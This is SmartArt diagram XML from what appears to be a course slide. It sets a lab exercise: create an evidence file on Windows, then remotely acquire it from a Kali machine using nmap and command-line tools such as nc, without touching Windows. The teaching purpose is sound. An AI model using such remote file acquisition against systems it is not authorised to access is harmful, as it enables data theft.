    <dgm:cxn modelId="{BBAA1694-1BB5-44C5-ABF5-203682607534}" srcId="{5E73800C-0F25-4317-AB8F-D63A811B0889}" destId="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" srcOrd="0" destOrd="0" parTransId="{3D8438CC-7B53-4A90-B635-D396E7FA84E1}" sibTransId="{04CBB1E8-D136-4D62-A577-640CF97D21DA}"/>
    <dgm:cxn modelId="{5EF3C4EC-F1C2-40AC-8596-621BB1BCD6B9}" type="presOf" srcId="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" destId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{4C495C6F-B25F-4556-BCBC-10BD476BF9C8}" type="presParOf" srcId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" destId="{DCC997E6-26A0-4011-85BE-4027DA7B17DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{B18D9F53-9670-427A-A4EB-579C564A3606}" type="presParOf" srcId="{DCC997E6-26A0-4011-85BE-4027DA7B17DF}" destId="{FAAD9AAB-FAE9-4CDA-97C8-043A29EBE4A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{4CEAEF55-998F-43BF-A9A9-F243721EB77E}" type="presParOf" srcId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" destId="{4CF35A89-D597-4CE4-9A78-4737C1073586}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{9195B833-4E25-4436-BE42-D24C061A81F8}" type="presParOf" srcId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" destId="{4CD31109-9E3D-456C-93DF-A51208351A50}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{C6A13942-6017-44C9-B19B-225EB4045813}" type="presParOf" srcId="{4CD31109-9E3D-456C-93DF-A51208351A50}" destId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8A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151BE3-D669-4BB0-AC61-E7F85651A3BB}"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AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Create a file in Windows</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7216AA6D-30E2-4756-9303-CB12A6B308EC}" type="parTrans" cxnId="{BC0E6945-55F8-4EA8-B90B-780F1BBD2F2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA3904EF-5CB3-44ED-B0AF-47309710BCC2}" type="sibTrans" cxnId="{BC0E6945-55F8-4EA8-B90B-780F1BBD2F2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05FDD808-7AD8-486B-AE70-F0E81ABD599E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>name it </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1"/>
            <a:t>yourFisrtLastNameEvidence.txt</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72853241-254E-4364-8F6F-B8BA919C4729}" type="parTrans" cxnId="{131658CC-8BCC-442B-A076-058B4D72D08F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C342FB4E-D51D-4D04-A6C2-79AFB821DF9C}" type="sibTrans" cxnId="{131658CC-8BCC-442B-A076-058B4D72D08F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72304965-AB8D-4489-82F0-98561736E34A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>the content of the file “hello </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1"/>
            <a:t>yourname!</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>”</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A7D5AF9-78A8-462F-91A0-7301C98E2BFD}" type="parTrans" cxnId="{1B0253C7-056D-48BC-80C0-B070DB16D7AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2AD0FB1-56B5-4CF2-A6AF-2F12B95BAFDC}" type="sibTrans" cxnId="{1B0253C7-056D-48BC-80C0-B070DB16D7AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>You don’t allow to touch Windows directly after you create the file</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FFEB251-3CFA-4377-AFC8-105424C17552}" type="parTrans" cxnId="{30107F5E-9C6F-4C02-883C-107F5AA9F2F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81B12F6C-1F4A-493E-921B-34445F5CFE15}" type="sibTrans" cxnId="{30107F5E-9C6F-4C02-883C-107F5AA9F2F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4587C326-4A84-4647-8405-9397D58FD220}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>you allow to access Windows from Kali</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31887AC5-8D11-4BA5-9E0E-130F352D98DA}" type="parTrans" cxnId="{DF115F38-5970-4E6D-AA89-53297587FCF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB67B6A6-A1E6-4DDD-BB84-776FAAE3970A}" type="sibTrans" cxnId="{DF115F38-5970-4E6D-AA89-53297587FCF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9817E12-2FC4-44AF-92B7-242E331AD9E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>assume nmap is installed</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89184CD1-E8E5-4B2B-98FD-1B61C55A070F}" type="parTrans" cxnId="{DADB0B91-AA2D-481E-821B-300B4346C9FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B89D892-78CB-441C-B88D-9C41A203A6AE}" type="sibTrans" cxnId="{DADB0B91-AA2D-481E-821B-300B4346C9FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F91DFA23-D284-4341-8532-CB37403B31AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Remotely acquire the file from Kali</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F1EF1E-52C0-47E0-812A-62C2CE0B137E}" type="parTrans" cxnId="{4F3125B3-B3EF-4FDA-B6AC-806A199EAE89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5CC911F-FB3D-4293-8437-B381AA47CA2D}" type="sibTrans" cxnId="{4F3125B3-B3EF-4FDA-B6AC-806A199EAE89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{074FAF12-CFE8-45F6-A1C0-4A2FEC05EEDA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>use command lines, e.g., nc</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{174060DF-09CE-4C73-B695-702212A73F13}" type="parTrans" cxnId="{13925413-CC33-4CFB-A306-4C8CC8FC2CAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9251EB57-2602-45C6-B7A6-B3EF3CEFD1C2}" type="sibTrans" cxnId="{13925413-CC33-4CFB-A306-4C8CC8FC2CAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" type="pres">
      <dgm:prSet presAssocID="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB31EE1B-2CD8-42BA-9E6A-E6BC7151A174}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65E265C5-14BD-478E-B996-E645DDDECCE7}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6DCAF14-153A-40B2-9DCD-09CC97694519}" type="pres">
      <dgm:prSet presAssocID="{EA3904EF-5CB3-44ED-B0AF-47309710BCC2}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27F39BC9-14A8-4576-84F7-BE4FA9E79632}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68AA5B98-4F51-4752-98CA-30EFB8E4F640}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{055CC929-4FE4-44F1-BA19-4ED5919518E9}" type="pres">
      <dgm:prSet presAssocID="{81B12F6C-1F4A-493E-921B-34445F5CFE15}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C9B6995-C30E-4801-B34B-F7FB7836995D}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE6B7A4E-ED62-4ED1-955A-93141812DCBE}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{460AB55F-F2D6-4D33-A421-3D88A995DED1}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{13925413-CC33-4CFB-A306-4C8CC8FC2CAC}" srcId="{F91DFA23-D284-4341-8532-CB37403B31AB}" destId="{074FAF12-CFE8-45F6-A1C0-4A2FEC05EEDA}" srcOrd="0" destOrd="0" parTransId="{174060DF-09CE-4C73-B695-702212A73F13}" sibTransId="{9251EB57-2602-45C6-B7A6-B3EF3CEFD1C2}"/>
    <dgm:cxn modelId="{DF115F38-5970-4E6D-AA89-53297587FCF1}" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{4587C326-4A84-4647-8405-9397D58FD220}" srcOrd="0" destOrd="0" parTransId="{31887AC5-8D11-4BA5-9E0E-130F352D98DA}" sibTransId="{AB67B6A6-A1E6-4DDD-BB84-776FAAE3970A}"/>
    <dgm:cxn modelId="{30107F5E-9C6F-4C02-883C-107F5AA9F2F4}" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" srcOrd="1" destOrd="0" parTransId="{3FFEB251-3CFA-4377-AFC8-105424C17552}" sibTransId="{81B12F6C-1F4A-493E-921B-34445F5CFE15}"/>
    <dgm:cxn modelId="{8C8AED5E-D994-403D-94FA-5808176C5320}" type="presOf" srcId="{4587C326-4A84-4647-8405-9397D58FD220}" destId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E1E99841-4A65-4E7D-99D1-6FDA64804681}" type="presOf" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{27F39BC9-14A8-4576-84F7-BE4FA9E79632}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BC0E6945-55F8-4EA8-B90B-780F1BBD2F2D}" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" srcOrd="0" destOrd="0" parTransId="{7216AA6D-30E2-4756-9303-CB12A6B308EC}" sibTransId="{EA3904EF-5CB3-44ED-B0AF-47309710BCC2}"/>
    <dgm:cxn modelId="{4478F559-74C4-4E95-A53D-312C2D8B5C91}" type="presOf" srcId="{F91DFA23-D284-4341-8532-CB37403B31AB}" destId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3E070F7C-20E8-4E49-8665-3BCE850ED05D}" type="presOf" srcId="{A9817E12-2FC4-44AF-92B7-242E331AD9E5}" destId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A03A3685-FEB1-45F6-9DB9-F386574143FA}" type="presOf" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5DFB568B-91E8-4596-AC76-382DF83670F9}" type="presOf" srcId="{074FAF12-CFE8-45F6-A1C0-4A2FEC05EEDA}" destId="{460AB55F-F2D6-4D33-A421-3D88A995DED1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DADB0B91-AA2D-481E-821B-300B4346C9FF}" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{A9817E12-2FC4-44AF-92B7-242E331AD9E5}" srcOrd="1" destOrd="0" parTransId="{89184CD1-E8E5-4B2B-98FD-1B61C55A070F}" sibTransId="{9B89D892-78CB-441C-B88D-9C41A203A6AE}"/>
    <dgm:cxn modelId="{22E7DBA8-D17B-48D3-BDCA-DE5D48DBC3A5}" type="presOf" srcId="{F91DFA23-D284-4341-8532-CB37403B31AB}" destId="{3C9B6995-C30E-4801-B34B-F7FB7836995D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{796446AB-5A7B-4EF1-A63B-458662B3F6B6}" type="presOf" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4F3125B3-B3EF-4FDA-B6AC-806A199EAE89}" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{F91DFA23-D284-4341-8532-CB37403B31AB}" srcOrd="2" destOrd="0" parTransId="{A2F1EF1E-52C0-47E0-812A-62C2CE0B137E}" sibTransId="{B5CC911F-FB3D-4293-8437-B381AA47CA2D}"/>
    <dgm:cxn modelId="{342CEDB7-A79F-48B7-808C-9E0E17847465}" type="presOf" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{FB31EE1B-2CD8-42BA-9E6A-E6BC7151A174}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6D2645BB-067A-4807-9AFE-1013DC373C86}" type="presOf" srcId="{05FDD808-7AD8-486B-AE70-F0E81ABD599E}" destId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1B0253C7-056D-48BC-80C0-B070DB16D7AE}" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{72304965-AB8D-4489-82F0-98561736E34A}" srcOrd="1" destOrd="0" parTransId="{2A7D5AF9-78A8-462F-91A0-7301C98E2BFD}" sibTransId="{B2AD0FB1-56B5-4CF2-A6AF-2F12B95BAFDC}"/>
    <dgm:cxn modelId="{FEAD20CC-1F6D-448B-AA59-D28FC850FDAF}" type="presOf" srcId="{72304965-AB8D-4489-82F0-98561736E34A}" destId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{131658CC-8BCC-442B-A076-058B4D72D08F}" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{05FDD808-7AD8-486B-AE70-F0E81ABD599E}" srcOrd="0" destOrd="0" parTransId="{72853241-254E-4364-8F6F-B8BA919C4729}" sibTransId="{C342FB4E-D51D-4D04-A6C2-79AFB821DF9C}"/>
    <dgm:cxn modelId="{5D70B8CE-E462-43E6-884B-5750840C2B49}" type="presOf" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FE428405-E3AA-44F2-8AD2-76D5820066BB}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BCC762B6-3420-42D1-8FFD-2A9704FC43A3}" type="presParOf" srcId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" destId="{FB31EE1B-2CD8-42BA-9E6A-E6BC7151A174}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C832ED18-70A2-43CB-8BCE-769E4EFFD957}" type="presParOf" srcId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" destId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{320ABCF6-0363-405A-9153-FB2E11CB922A}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{65E265C5-14BD-478E-B996-E645DDDECCE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A335C3F8-E0C1-4169-B914-1305A0A2478A}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C9618DB9-C108-46D6-9CBD-B303BA264FE9}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{A6DCAF14-153A-40B2-9DCD-09CC97694519}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BCA8AF26-E3C2-4C0D-A5D0-E59BA1557625}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E1221A0F-CA56-4A58-82A3-7E710E945669}" type="presParOf" srcId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" destId="{27F39BC9-14A8-4576-84F7-BE4FA9E79632}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A098D6DF-D0BA-40F3-84EC-8170430E73F8}" type="presParOf" srcId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" destId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{17C3E5E3-9FD3-4891-97AF-558224537B03}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{68AA5B98-4F51-4752-98CA-30EFB8E4F640}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{98037618-A0C8-4455-B1B1-52E7D89564CC}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50B800F4-140A-48DC-A9A4-3955307BC2CA}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{055CC929-4FE4-44F1-BA19-4ED5919518E9}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{99793483-BBD2-4119-B9D6-86BE43A3EE55}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
